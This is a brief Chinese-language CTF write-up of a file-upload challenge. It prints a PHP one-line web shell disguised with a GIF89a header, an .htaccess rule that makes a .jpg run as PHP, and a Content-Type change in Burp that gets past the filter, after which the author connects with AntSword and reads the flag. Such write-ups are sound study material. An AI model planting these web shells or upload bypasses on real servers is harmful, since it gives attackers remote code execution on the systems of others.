一周没做ctf了,今天看一道upload文件上传题:
我试图直接上传一句话木马的.php文件,如下:
php后缀的文件不行的话,我可以上传jpg:
发现有文件头检查,使用下面这个一句话木马:
GIF89a
<script language='php'>eval($_POST['shell']);</script>
这会文件是已经上传成功了,但是jpg文件的一句话木马还不行,它无法执行,也就是现在我们还无法使用蚁剑连接,然而又因为:后缀名但凡包含ph的都被过滤了,这就意味着修改怎么修改后缀php都无法绕过,只能另寻他法,
下面试试上传一个 .htaccess :
文件名为 .htaccess ,内容为:
<FilesMatch "test.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
还是被检测到文件类型不对了,可以试试更改 Content-Type 为 image/jpeg:
BP抓包:
上传成功,我的文件test.jpg 现在就可以以php 文件执行,可以通过蚁剑连接:
在根目录下找到flag: